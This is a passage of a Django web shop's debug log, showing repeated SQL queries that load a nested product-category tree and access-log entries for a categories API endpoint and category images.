ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:03:07,017 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:03:07,020 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:03:07,024 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:03:07,028 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:03:07,031 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:03:07,033 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:03:07,037 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:03:07,041 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:03:07,046 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:03:07,050 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:03:07,054 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:03:07,058 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:03:07,062 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:03:07,068 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:03:07,072 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:03:07,075 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:03:07,078 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:03:07,081 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:03:07,083 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:03:07,086 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:03:07,088 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:03:07,091 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:03:07,093 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:03:07,096 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:03:07] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:03:07] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 13:03:07] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 13:03:07] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 13:03:09] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [19/Dec/2019 13:03:09] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 13:03:09] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 13:03:11] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [19/Dec/2019 13:03:12] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 13:03:14] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [19/Dec/2019 13:03:15] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [19/Dec/2019 13:03:19] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 13:03:20] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [19/Dec/2019 13:03:20] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 13:03:25] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [19/Dec/2019 13:03:26] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [19/Dec/2019 13:03:26] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [19/Dec/2019 13:03:29] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [19/Dec/2019 13:03:29] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 13:03:32] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 DEBUG 2019-12-19 13:03:33,755 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:03:33,765 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:03:33,770 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:03:33,775 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:03:33,783 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:03:33,788 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:03:33,793 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:03:33,797 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:03:33,801 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:03:33,806 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:03:33,809 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:03:33,813 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:03:33,817 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:03:33,821 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:03:33,826 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:03:33,829 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:03:33,833 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:03:33,836 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:03:33,841 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:03:33,846 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:03:33,849 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:03:33,853 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:03:33,856 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:03:33,859 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:03:33,862 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:03:33,867 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:03:33,870 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:03:33,874 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:03:33,878 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:03:33,882 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:03:33,885 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:03:33,887 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:03:33,889 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:03:33,891 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:03:33,894 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:03:33,897 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:03:33,900 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:03:33,902 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:03:33,905 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 